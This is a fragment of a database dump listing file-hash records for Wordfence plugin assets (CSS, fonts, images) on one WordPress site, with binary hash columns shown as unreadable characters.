('·Ñ€†›s®fu\Z»·g€í', 'wp-content/plugins/wordfence/css/license/response-global.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/response-global.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '}û·#Å!+hØNài@', 'VìØ[’''ŸÛÝyyX?üyeV{F¦‡éêeCÂlý%˜', '', 0, '?'),
('²¬!Ã$;1pñT‡‘¤{s', 'wp-content/plugins/wordfence/css/license/response-variables.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/response-variables.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÔŒÙ\0²é€	˜ìøB~', 'ã°ÄB˜üšûôÈ™o¹$''®Aäd›“L¤•™xR¸U', '', 0, '?'),
('âÒë¬$ìžŠÏ#…QX¿', 'wp-content/plugins/wordfence/css/license/response.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/response.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'V·’š€7iixWC›', '××''ç˜Þù=¸Ò°»‚\0×Ì€> ŠPÆ5a‚Ë	d', '', 0, '?'),
('¾˜E&4¤¯Po¶,¤ 4=', 'wp-content/plugins/wordfence/css/main.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/main.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'C×¯Uqÿ''ù•]0}²ÏP', ':>\rs´*žç±À.Ð0Ír¡Ü4\\¯KnM£ÙÂ', '', 0, '?'),
('ø5m¢0Rn-ààï}V]', 'wp-content/plugins/wordfence/css/phpinfo.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/phpinfo.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>ÅëQ÷Øæ!…0w/¨è“´', 'Çýýa@|­®I\r=\Z^ÎµÂd)ˆ[¶¹ø†ÎW²å', '', 0, '?'),
('vi1ìâ¥#&BnX\r¹a«', 'wp-content/plugins/wordfence/css/wf-adminbar.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-adminbar.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô§_SZÚ‰Ë´&nQ÷üW¥', 'Ü­¯3[=«[è÷¨]|Djga,X	¶n-H{Úo', '', 0, '?'),
('M0¦ÞönÞ\n.ZÑ‚óA', 'wp-content/plugins/wordfence/css/wf-colorbox.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-colorbox.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'PX)p!ƒ¾N8¦j­Œ', 'o©t0³\r™P2¡è±N¹­óæéiÌ×ÂKæÛu¤àõ', '', 0, '?'),
('èTÑLP Áàãaþ»p', 'wp-content/plugins/wordfence/css/wf-font-awesome.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-font-awesome.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸''ÄÿMäçÙ‹øVµª¿:', '997dIŠOuÖ-Æøùñ%enÔ» 1ºï„é¾ÓI', '', 0, '?'),
('º,Rê_‘‘Ïûoˆ™N', 'wp-content/plugins/wordfence/css/wf-global.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-global.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®<ÎæB‡K''>Îè0\n¹', '•ßœø<ú¨Lø”ºü¯&<G•6YŒŽÜM‰Ž~', '', 0, '?'),
('*}§€€¨RpËj{=ÊRr', 'wp-content/plugins/wordfence/css/wf-ionicons.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-ionicons.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Al¡°sÜÊjÀâ¯ƒ', '×’–ð“4ÌË®Àv¨ùãÁ‰MæŽ`—V÷ëýZô', '', 0, '?'),
('\r%1E¾Á²V?!1Í\rS“', 'wp-content/plugins/wordfence/css/wf-onboarding.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-onboarding.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶š?Û·Bq-UOÕZe ', 'ÝæÃÔ¶¼X}˜•ÍCÓ_ä£,°² fFíÍ*6çÊ', '', 0, '?'),
('èâÁåàU);01¶„J÷', 'wp-content/plugins/wordfence/css/wf-roboto-font.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-roboto-font.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸Á]ÕïðOŒuÝµœ', 'ôŠ+ÅhJ~¿Ê†´ª*éìa* ýâGb67§\r©:±', '', 0, '?'),
(']Hh}¦áB¡“-Fî¤â', 'wp-content/plugins/wordfence/css/wfselect2.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wfselect2.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷\Z¹’´iÉ''½óûä¨Rh', 'oÎÞ-:ØëÊ”0¡«ÆºÛÕëÎcsu·»Ñ¹œQ7', '', 0, '?'),
('Ÿ›½-|ËáÔ*íyÌ', 'wp-content/plugins/wordfence/css/wordfenceBox.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wordfenceBox.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'C¿ÚWYœ~äHœ#ì]', 'šrºŽµ¨{µÛ\ZI‰5™O1”‡¤QÜÝÓ‡¨£Ò÷Cßï', '', 0, '?'),
('ÍŽ3×¢àJynÎþÄ€Mà', 'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þænq*Šîõ€ZF‰)2­', 'áü&4"\rQjXãmN"ãÉ?P¾o”Í\\°Æõ?¹ùŒ', '', 0, '?'),
('ç2\Zð‰ {D·Zý‚¸-', 'wp-content/plugins/wordfence/fonts/ionicons.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/ionicons.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬ýµh³ßI­15[I]J', '*¡×\\&¿tä­¨\\Ã	gTw°‰µ¯,Æ1ƒ©¢', '', 0, '?'),
('ôZÍë–Qµ!ÕÐúö®* ', 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`y\0#xÄsúGìJ¶Öt°ä', 'ÛAárëÐÄx?jŽ’Ò#‡ÂCõFËO‚G-¢SÖ÷$', '', 0, '?'),
('jt¼ÙZáêÜ¿î,‡µ', 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'rš¼ÂøÁa©aåîi', '{J®L ÙßÍ»&Õñ{©½{¢ÌT:š¥£Âã‡B', '', 0, '?'),
('>u¸ë™Ê¸…!4N2ÚÃ', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Û,Ê;LŠ''³´dee´Ÿ', '¶+GûT}äm)*ÝÌ[’µÓc5½ZÝN-v>´', '', 0, '?'),
('ÀÆÎûúmºÐ{·@¯mß', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'oLFÊ’4å¼Õiî--', 'Á‡¦Cc#1_»œ|Ë·Z  ¿ˆ1€—É¾ÜÕÏYxí', '', 0, '?'),
('Ó•Ëý–Â\n§®tÊ0', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'mpGÌÑ×aBþšNX>œó(', '%Á-*Î¨6FžÈiº\rWÏ¹‰M×½¬WI±…†:výD', '', 0, '?'),
('ƒÐ¸+:3èXnNˆtexöX', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥ÔõìØ{Wü7h>—­¯', '„	2m˜èw‡ó3)zWg‘Þv{AfŠàHu`Co', '', 0, '?'),
('G:Z¹×]Y!tI¯¯¡Ü"', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚjI78Ÿ{’·rÉP­', 'Uk…úæ´†¿ôZM=OEw¨D²”Šw‡è |I¼;', '', 0, '?'),
('º]K{ÌÙ¯¼æ`Ø{¿,', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+EÒYHÍí<YPK=°S', 'Û‹ü&ò:^Áý±G¿Í×&BˆŒ„2ÃPC‡¿~÷¯ò…', '', 0, '?'),
('pwáÒQ„FécÙß b*', 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@$ÆqG¹2k5$¡†z”', 'Ö†F*`Ý''ê«O tµriR:íj0áó’W\Z–=¨j€‹', '', 0, '?'),
('‹ó„Už]R²šÛ)Y¥Ëm', 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nûj®À¹ô0ö£âûã›9', '¼†\ZðÒ¨2Á#°…s:ÕÐ \n		vƒùÃ˜+l´', '', 0, '?'),
('4;`ß¯zŽ?	Å{Çž@', 'wp-content/plugins/wordfence/images/2fa-whole.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/2fa-whole.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'üÑhÂ»ñßÞÄ$\ZPfX²', '÷ÆªÉØÓåËU[Z~·Ï^Ød''àXèÙ®ÖÊÛ', '', 0, '?'),
('Ú2àŽ6,Ìž|ke‡L\ns', 'wp-content/plugins/wordfence/images/2fa1.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/2fa1.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/)Ýh\\ h¨Gæ¯8ü', 'CÙ%ñ0…z)f ý¶±@Ît>õŠÉ¶{TˆÙ8·o‹', '', 0, '?'),
('ØJ=R''ÿ¬ßt^ôŸ}ú\n', 'wp-content/plugins/wordfence/images/2fa2.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/2fa2.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä¾ÜîŠÔû\0¿”H', 'n¸põŒÊ…¹¨üGÊ¿0Õ6KqÁJ]Œî¾Ã¾Jû', '', 0, '?'),
('æ§˜ºî7Ý^ô»b³"³', 'wp-content/plugins/wordfence/images/back_disabled.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/back_disabled.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hÙÂÔgØúïiîã†>', 'Žä›Nó7ÓgÎ‹Ä?ìFb!}„­Ý¿°ÝC¨­é³‡', '', 0, '?'),
('ëÈÄ×®FîêpÞs¥Ø4£', 'wp-content/plugins/wordfence/images/back_enabled.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/back_enabled.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡¡ñø]È÷£”ÒHŽÃ', '¹¾¶9í‡¥)Rµ$px#¯q Žþ°£˜Ç{#LøOº', '', 0, '?'),
('ˆ©´÷nï\nõ\0Ü-i', 'wp-content/plugins/wordfence/images/blocking.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/blocking.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£''-H•f—Œ˜<1', 'A5„Y9Ž®à\0¶óOÄtqäÐ–L\\º}Ëa½Ô&â´', '', 0, '?'),
('^yG=ÚœFg;3‘Ã¡©', 'wp-content/plugins/wordfence/images/button-grad-grey.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/button-grad-grey.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•ÄRCì¿ÊTyÕý?Þ', 'DÞú€ÃÁÖHÙ~µ’´Ï¨¢Pº_á§{!Ê×', '', 0, '?'),
('N7—Aä´\0ÂnnV¾Ö‘í', 'wp-content/plugins/wordfence/images/checkbox.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/checkbox.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"³ÈG\rû6|ôˆ˜€''', 'ð‚y~`w(j×~Þ=ë¤¼&·ýÝ´ŠßìQ>`^Þx', '', 0, '?'),
('oäÙÀßùYŠÆÚ…”ÌX¼', 'wp-content/plugins/wordfence/images/flags.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/flags.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'W7Ì ‚Œ(ÐË¿!­\Z7Ô', 'Bxö0%Lyµ6øú!—óX\\z/< n²6=\ZWÄ', '', 0, '?'),
('.¦EÇ[JõÏlžxßã', 'wp-content/plugins/wordfence/images/forward_disabled.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/forward_disabled.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'M_ÚÖZ?ÚN)ºÒŠê:Ü5', '›®€/ß<>O&ßÈ•JRÝ‡eÄ}š(»›m', '', 0, '?'),
('˜\0hî”Kf•\0ðø', 'wp-content/plugins/wordfence/images/forward_enabled.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/forward_enabled.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U\0/3e4e™Ï×ƒÞö', '0¼´Q7018—Þª9-–z9Ø½qðÓSrÄ’ÓPõÓ', '', 0, '?'),
('û÷Þçª’·u£¡\rZJW+', 'wp-content/plugins/wordfence/images/help.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/help.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$NÇü;''ý‡MÏÏùò Y', '–ïé\Z²7\0Ùé¤rÂ€/i£Òz;ki,›=L›Z¿g™™', '', 0, '?'),
('Ù˜Ý"P´Üž÷Æ,ƒ©Ø', 'wp-content/plugins/wordfence/images/icons/ajax24.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajax24.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K:û„²·õmð™—£P½', 'j*äeŽó©õdoX¤~§7Âë&€²‚Nü9É|L•Ç', '', 0, '?'),
('''‹ü»ž ˜oÈÍSŠ', 'wp-content/plugins/wordfence/images/icons/ajax3.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajax3.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'mwßß´tê“''\n¤ñís', 'œdzÉê\nºyK£Æ®¨è’''#]Òx	VJRø¨.=:', '', 0, '?'),
('¡êyî&a’A 7Â]Dm', 'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajaxRed16.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´Ïà%º»©B\ng 2…‰;', 'D,…A£JÀíÀƒ»lOS‚p¢eØ‡£&ªÚÆ', '', 0, '?'),
('»ÒÉ4þ™õ‰ù=Ž¸', 'wp-content/plugins/wordfence/images/icons/ajaxScan.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajaxScan.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘Ê–´Ñ´­÷~fúúžiÁ', 'ß©0¼Ôò£ÕÑ¦®Æ»H\n‰•Ž‹ÀÂ¡;Â', '', 0, '?'),
('j&ºV1™¬®6“4ª¯ëâ', 'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾íér‰Á9 #Ó{…', 'ï¾±ÏÜn—Ñ¿¹0c~NüÿræñAuóg~Î”ÎàI', '', 0, '?'),
('(x*J û…,…LÃ›nç<K', 'wp-content/plugins/wordfence/images/icons/arrow_refresh.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/arrow_refresh.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k•w„`ö`ª|ô}$G€§', 'u¤/2/¼Œ»@‘Hž_Ilh•™ó¸/aU:«	', '', 0, '?'),
('6[fÀ9¸?†“ _Ç', 'wp-content/plugins/wordfence/images/icons/bullet_yellow.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/bullet_yellow.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J&ûÞÓÉŒŠýìîÔ”Q<', '1µú±Nß—÷¹’ú×?*€i×Ã­!FýMpè9^.', '', 0, '?'),
('ð­á—9éBÏ ÷3…ú', 'wp-content/plugins/wordfence/images/icons/check-care.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check-care.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š@“Ûn?duäÇ¡os°?', 'JïåçõXÝ;¡Wí`i¹"¶™[*øâõ&`K°>r4Ð	', '', 0, '?'),
('á\\mâ”]I{‘ËB]¦', 'wp-content/plugins/wordfence/images/icons/check-premium.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check-premium.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ß‡…º“`Þ©:\r‹N·', '•&«Æy$ƒfÜÓDóàz’²ãú‘Ê9Í§÷|VqVê', '', 0, '?'),
('ËcŸÚ®q€¶"–.|0>', 'wp-content/plugins/wordfence/images/icons/check-response.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check-response.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'NŠ¶FòôÅØÆ¿â¦', '82f…)³o>Øæ5iq)»Ãe=ÒÖò©G}ìà', '', 0, '?'),
('ta©;_Y\npª=[_:BûŠ', 'wp-content/plugins/wordfence/images/icons/check.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸…DFÙì¦Ô…ËPèL', 'éÉ÷ù+ÇßÊ£“Ñ„È¯÷Ù?Ôõâ+×ý\0_ÈÅ´Qq¹', '', 0, '?'),
(']¥¤Ê*…¤…ÿJ–', 'wp-content/plugins/wordfence/images/icons/email_go.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/email_go.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ºªjÌÙEü´H)«.½í', '÷½& ôqC1QU´_.OØî3¿ÂËò1!&Ðç—Û´ªû', '', 0, '?'),
(' ¸‹‡`%ú’{ÍüÒ+›ó', 'wp-content/plugins/wordfence/images/icons/error128.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/error128.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É:Þ%7÷!Á´.Ñ', '{h\0,Ž]ózñk“Vî{Ò—¢6nG\nÀxš©s9ê', '', 0, '?'),
('z¢5·*\ZADZCk¬áj®’', 'wp-content/plugins/wordfence/images/icons/magnifier.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/magnifier.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨§uO®{:qcVãî''', '™ at¿¿vºdQÃë¨0(ìIj®Æ–O§¢$e(*', '', 0, '?'),
('¯Î¡~×ß“þ:ýèàÂøeo', 'wp-content/plugins/wordfence/images/icons/tick128.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/tick128.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åÄŸ‹øc·h4"èÝ«', 'ÖÒû²çV“ø}X e~G[C©å³†¶ã5›²¥Š±ï', '', 0, '?'),
('ÿ;`º$rçŸËÑ$³ž¦=', 'wp-content/plugins/wordfence/images/icons/warning128.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/warning128.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pÏGÀI×t*ö“ÆÊNp=', 'ù¹äÞ*“/‚ØäÈ¾s›øtèAþˆ¸Ò}.b''\\', '', 0, '?'),
('uê6êÈ4E~ñø:ðï', 'wp-content/plugins/wordfence/images/icons/working-indicator.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/working-indicator.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿«œéVF‘ ë{N	þ''G', '„fXºîRZ‚|:O…b Ç=fê[yßÛá5 ~	', '', 0, '?'),
('ªXàá@ÁÔ%½1C„Ái', 'wp-content/plugins/wordfence/images/lightbox-controls.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/lightbox-controls.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm]¼a’¬•\\$É', 'Ç—’h?àïïSéîÍ)¸:›ÁÖi@h. X×g”†', '', 0, '?'),
('ƒ¨?ç¬Úz6¤—ÛaDz', 'wp-content/plugins/wordfence/images/loading.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/loading.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K:û„²·õmð™—£P½', 'j*äeŽó©õdoX¤~§7Âë&€²‚Nü9É|L•Ç', '', 0, '?'),
('ýKjòâªhº‘èù', 'wp-content/plugins/wordfence/images/loading_background.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/loading_background.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬ô''é2û”p\nK‹X´ì', 'ÍÎŽ%XïÅ–F¼ÿçÜò1sÏ;ÀÎLëzrç’»', '', 0, '?'),
('ï¾˜QŒ¹©÷´)B\në,', 'wp-content/plugins/wordfence/images/loading_large.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/loading_large.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚Y¼®{Ob‰UW~¼YË™', 'p8ñ''—÷™	t—Ïß:„Qßo]{5G1åèã»ÅE¾Ç', '', 0, '?'),
('sâ™¼{DRÌ[¥kÙ1ûI', 'wp-content/plugins/wordfence/images/logo.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logo.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶zF‰åÞ€WÕ\rlá~6', 'VÉ{“‰Q9ïV	±†æü°·J	X™qˆ†ÖÚ€c“', '', 0, '?'),
('ªD¼8-¬š‰Â¤rØl', 'wp-content/plugins/wordfence/images/logos/shield-care.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-care.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	þ s‘hß‰\0‘tvó', '£f2"(>µlÈH93 öÉÌè¦ªé	ÂC$„<', '', 0, '?'),
('[À¼Aù0¤b[åBùG', 'wp-content/plugins/wordfence/images/logos/shield-free.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-free.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm3k#¿^´–\Z\Z+W', '£Lmdö–1¥a ×£M§\\¯m(#p„^1Mô‹', '', 0, '?'),
('Û‘Ý€më9¢˜l©^ŸHß', 'wp-content/plugins/wordfence/images/logos/shield-premium.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-premium.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚÃ\r­-È­\nQ—ó™V‹', '?mUL¤åéü-l¡‘ZOI›Ò,XS”M×­ïÞ-‰', '', 0, '?'),
('å‡Ó _žQ?øÁ«¤#', 'wp-content/plugins/wordfence/images/logos/shield-response.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-response.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_ª\nÙˆ1:/(d%Ü…ÿ', 'Ò\ZºjtYãœaW=x!›•[ð²4H!|¤Áñ·–îí', '', 0, '?'),
('¸d×]Ñ&3š¶ÖNˆ=', 'wp-content/plugins/wordfence/images/logos/shield-white.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-white.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õdXÌ#Ìp°RÃ°J¾', 'ÏœL‰OÑ''Ð(öEqHÃîlÅ@èüÊ)O§ŒŽ­', '', 0, '?'),
('äz^}ù„Â¤hh3\ržˆw', 'wp-content/plugins/wordfence/images/options.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/options.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥VÉðÑ´®Çó»Aï¥', 'D:ÂbwÃ#^›€Ï4¬BÀKIP‰?	zÀn‰VÌ_', '', 0, '?'),
('ëx°Dª.¶áÚm~<×2', 'wp-content/plugins/wordfence/images/ratelimiting.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/ratelimiting.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0[›ìM±Éž¥yP°é', 'ô@ƒê­ôSÄçy''èN+™kéBÀ¿3†J!PbÆ–•', '', 0, '?'),
('èò‡òQËoµH*¹‚À(ï', 'wp-content/plugins/wordfence/images/sort_asc.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',¸»I§Å+Æ¾ êú=€ü', 'd¹CìT¾èµÚ…îe&,)Ñ´úàFGî\ZdãONÅ', '', 0, '?'),
('5¡7ðN	C=†Û-ØœcÄ', 'wp-content/plugins/wordfence/images/sort_asc.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“&­D®KëÞÝzSÂ§0', 'N—QÓ* ‘TZ%PºÚ%êÝjÜ‘tZn/Ÿ', '', 0, '?'),
